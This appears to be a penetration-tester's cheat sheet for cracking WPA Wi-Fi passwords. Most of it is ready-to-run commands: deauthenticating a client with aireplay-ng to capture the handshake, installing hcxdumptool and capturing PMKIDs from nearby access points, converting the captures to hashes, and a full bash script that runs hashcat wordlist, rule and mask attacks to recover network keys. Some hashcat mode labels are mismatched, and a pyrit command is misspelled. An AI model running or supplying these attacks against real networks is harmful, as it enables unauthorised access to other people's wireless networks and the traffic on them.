WPA

Standard approach - No roaming

info

You must listen on the right channel filtering by BSSID.

Deauthenticate a supplicant

aireplay-ng -0 20 -a <ap_mac> -c <supplicant_mac> <wlan1mon>

tip

Airodump should say "WPA Handshake".

Roaming - PMKID attack

tip

It only works on AP that supports roaming.

Installation

apt install libssl-dev libz-dev libpcap-dev libcurl4-openssl-dev
cd /opt
git clone https://github.com/ZerBea/hcxdumptool.git
cd hcxdumptool
make
make install
cd /opt
git clone https://github.com/ZerBea/hcxtools.git
cd hcxtools
make
make install
cd /opt

Attack

1. Traffic capture

Opportunistic attack without mac filtering

hcxdumptool -o <pmkid.pcap> -i <wlan1mon> --filtermode=2 --enable_status=3

Target one or more BSSID

info

Example: 50D72257AC2F

hcxdumptool -o <pmkid.pcap> -i <wlan1mon> --filterlist=<mac.txt> --filtermode=2 --enable_status=3

2. PCAP to hashes

hcxpcaptool -z <out.hashes> <pmkid.pcap>

3. Crack

info

WPA-PMKID-PBKDF2 (2500)

hcxpcaptool -o <hccapx.hashes> <pmkid.pcap>

4-way handshake to hashes

info

WPA-PMKID-PBKDF2 (16800)

hcxpcaptool -z <out.hashes> <pmkid.pcap>
cat *.hashes > all_psk.hashes

info

WPA-PMKID-PBKDF2 (2500)

/usr/lib/hashcat-utils/cap2hccapx.bin <pcap.pcap> <ESSID.hccapx> [<ESSID>]
cat *.hccapx > all.hccapx

Cracking with a crackstation

info

Script that automates the cracking of hashes captured via the PMKID attack (16800). The methodology is based on patterns of known enterprise PSK.

#!/bin/bash

# time ./pskraken.sh 16800|2500
# You must create `lower_dico.txt`. It is your custom wordlist with the first letter in lowercase
# You must create `separator.txt`. It is a file containing one separator by line

sed 's/^\(.\)/\U\1/' lower_dico.txt > upper_dico.txt

## Combine
echo "Combining..."
/var/app/hashcat-utils/bin/combinator.bin lower_dico.txt lower_dico.txt > ll_dico.txt
/var/app/hashcat-utils/bin/combinator.bin lower_dico.txt upper_dico.txt > lu_dico.txt
/var/app/hashcat-utils/bin/combinator.bin upper_dico.txt lower_dico.txt > ul_dico.txt
/var/app/hashcat-utils/bin/combinator.bin upper_dico.txt upper_dico.txt > uu_dico.txt
cat ll_dico.txt lu_dico.txt ul_dico.txt uu_dico.txt | sort | uniq > concatenated.txt #Wifikey KeyWifi
/var/app/hashcat-utils/bin/combinator.bin ll_dico.txt lower_dico.txt > lll_dico.txt #wifikeymobile
/var/app/hashcat-utils/bin/combinator.bin ul_dico.txt lower_dico.txt > ull_dico.txt #Wifikeymobile
/var/app/hashcat-utils/bin/combinator.bin uu_dico.txt upper_dico.txt > uuu_dico.txt #WifiKeyMobile

## Separator
echo "Separating..."
for separator in `cat separator.txt`; do
        hashcat -a 1 upper_dico.txt lower_dico.txt -j '$'${separator} --stdout > ul_separated${separator}.txt #Wifi-key
        hashcat -a 1 upper_dico.txt upper_dico.txt -j '$'${separator} --stdout > uu_separated${separator}.txt #Wifi-Key
        hashcat -a 1 lower_dico.txt lower_dico.txt -j '$'${separator} --stdout > ll_separated${separator}.txt #wifi-key
        hashcat -a 1 upper_dico.txt uu_separated${separator}.txt -j '$'${separator} --stdout > uuu_separated${separator}.txt #Wifi-Key-Mobile
        echo "[+] Separated with "${separator}
done

## Cracking
echo "Quick Win Cracking"
dico_quick="lower_dico.txt upper_dico.txt concatenated.txt lll_dico.txt ull_dico.txt uuu_dico.txt"
for dico in $dico_quick; do
        hashcat --stdout $dico -r /var/rules/OneRuleToRuleThemAll.rule  -r /var/rules/append-year-n-bang-or-plus.rule -r /var/rules/leetspeak.rule | hashcat -m $1 --potfile-path out.pot out.hashes
done

echo "Cracking with separators"
for separator in `cat separator.txt`; do
        hashcat --stdout uu_separated${separator}.txt -r /var/rules/best64.rule | hashcat -m $1 --potfile-path out.pot out.hashes
        hashcat --stdout ul_separated${separator}.txt -r /var/rules/best64.rule | hashcat -m $1 --potfile-path out.pot out.hashes
        hashcat --stdout ll_separated${separator}.txt -r /var/rules/best64.rule | hashcat -m $1 --potfile-path out.pot out.hashes
        hashcat --stdout uuu_separated${separator}.txt -r /var/rules/best64.rule | hashcat -m $1 --potfile-path out.pot out.hashes
        hashcat --stdout uu_separated${separator}.txt -r /var/rules/append-year-n-bang-or-plus.rule -r /var/rules/leetspeak.rule | hashcat -m $1 --potfile-path out.pot out.hashes
        hashcat --stdout ul_separated${separator}.txt -r /var/rules/append-year-n-bang-or-plus.rule -r /var/rules/leetspeak.rule | hashcat -m $1 --potfile-path out.pot out.hashes
        hashcat --stdout ll_separated${separator}.txt -r /var/rules/append-year-n-bang-or-plus.rule -r /var/rules/leetspeak.rule | hashcat -m $1 --potfile-path out.pot out.hashes
        hashcat --stdout uuu_separated${separator}.txt -r /var/rules/append-year-n-bang-or-plus.rule -r /var/rules/leetspeak.rule | hashcat -m $1 --potfile-path out.pot out.hashes
done

echo "Cracking 8 digits long"
hashcat -a 3 -m $1 --potfile-path out.pot out.hashes ?d?d?d?d?d?d?d?d

echo "Cracking based on english and french wordlists"
hashcat -m $1 --potfile-path out.pot out.hashes /var/dico/Small/english.txt -r /var/rules/best64.rule
hashcat -m $1 --potfile-path out.pot out.hashes /var/dico/Small/english.txt -r /var/rules/leetspeak.rule
hashcat -m $1 --potfile-path out.pot out.hashes /var/dico/Small/english.txt -r /var/rules/append-year-n-bang-or-plus.rule
hashcat -m $1 --potfile-path out.pot out.hashes /var/dico/Small/french.txt -r /var/rules/best64.rule
hashcat -m $1 --potfile-path out.pot out.hashes /var/dico/Small/french.txt -r /var/rules/leetspeak.rule
hashcat -m $1 --potfile-path out.pot out.hashes /var/dico/Small/french.txt -r /var/rules/append-year-n-bang-or-plus.rule
/var/app/hashcat-utils/bin/combinator.bin lower_dico.txt /var/dico/Small/english.txt | hashcat -m $1 --potfile-path out.pot out.hashes
/var/app/hashcat-utils/bin/combinator.bin lower_dico.txt /var/dico/Small/french.txt | hashcat -m $1 --potfile-path out.pot out.hashes

echo "Cracking based on specific wordlists"
dico_small="/var/dico/Small/rkg.txt /var/dico/Small/cow.txt /var/dico/Small/cnets.txt /var/dico/Small/rockyou.txt"
for dico in $dico_small; do
        hashcat -m $1 --potfile-path out.pot out.hashes $dico -r /var/rules/best64.rule
        hashcat -m $1 --potfile-path out.pot out.hashes $dico -r /var/rules/leetspeak.rule
done
hashcat --stdout uuu_dico.txt -r /var/rules/OneRuleToRuleThemAll.rule | hashcat -m $1 --potfile-path out.pot out.hashes

## Result
echo "Final Result:"
cat out.pot

Cracking without a crackstation

Aircrack

aircrack-ng -w <dico> <cap.pcap>

Rainbow tables - cowpatty

genpmk -f <dico> -d <computed_hashes.txt> -s <essid>
cowpatty -r <cap.pcap> -d <computed_hashes.txt> -2 -s <essid>

GPU - pyrit

pyrit eval
pyrit -i <dico> import_passwords
pyrit -e <essid> create_essid
pyrite batch
pyrite -r <cap.pcap> -b <ap_mac> attack_db

rm -r ~/.pyrit/blobspace

GPU - hashcat

https://hashcat.net/cap2hccapx/

hashcat64.exe -m 2500 -r rules\best64.rule cap\capture.hccapx dict\custom_dict.txt

Standard approach - No roaming​

Deauthenticate a supplicant​

Roaming - PMKID attack​

Installation​

Attack​

1. Traffic capture​

2. PCAP to hashes​

3. Crack​

4-way handshake to hashes​

Cracking with a crackstation​

Cracking without a crackstation​

Standard approach - No roaming

Deauthenticate a supplicant

Roaming - PMKID attack

Installation

Attack

1. Traffic capture

2. PCAP to hashes

3. Crack

4-way handshake to hashes

Cracking with a crackstation

Cracking without a crackstation